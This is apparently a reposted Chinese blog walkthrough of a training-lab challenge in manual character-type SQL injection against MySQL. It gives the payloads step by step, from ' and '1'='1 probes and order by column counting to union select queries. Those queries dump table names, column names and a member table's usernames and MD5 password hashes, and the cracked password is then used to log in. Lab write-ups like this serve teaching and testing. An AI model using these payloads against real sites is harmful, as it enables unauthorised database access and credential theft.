SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录
2021/7/16 19:08:15
本文主要是介绍SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一进来看到一个停机公告,点开查看
发现链接中有字符参数,怀疑存在字符型注入
输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1
' and '1'='2
发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。
通过order by 子句判断字段数
order by 1
order by 2
order by 5
order by 4
当order by 4 时网页正常响应,by 5时发生错误,说明存在4个字段。
判断回显位置。
通过union select 判断回显位置。
id=1' union select 1,2,3,4--+
回显位置为 2 和 3
爆当前数据库 id=1' union select 1,2,database(),4--+
得到数据库是 mozhe_discuz_stormgroup
爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+
得到数据表为 notice,stormgroup_member
爆列名 id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema like database() and table_name like 'stormgroup_member'--+
得到列名为 id,name,password,status
爆内容
爆出name,password,status的内容
id=1' union select 1,2,group_concat(name,',',password,',',status),4 from stormgroup_member--+
得到 name 为 mozhe , password 为 e804b0037bec0607a82e7be037e2e51d
password是个md5值,在md5在线解密网站上解密
密码为 196397
利用得到的账号密码登录
得到key mozhec2b968ab2172fe26c724b10d8b2
这篇关于SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-25MySQL报错Duplicate entry '0' for key 'PRIMARY'
- 2024-05-29阿里 Canal 实时同步 MySQL 增量数据至 ClickHouse 数据库
- 2024-05-24在Linux下管理MySQL的大小写敏感性
- 2024-04-26MySQL查出时间比实际晚8小时的解决方案
- 2024-04-01JPA不识别MySQL的枚举类型
- 2024-03-30mysql数据库表卡死解决方法
- 2024-03-15MySQL多数据源笔记5-ShardingJDBC实战
- 2024-03-11natural join mysql
- 2024-03-11关于VS2017,VS2015 中利用 EF使用Mysql 不显示数据源问题解决方案
- 2024-02-26mysql 阿里云xb后缀备份文件恢复-icode9专业技术文章分享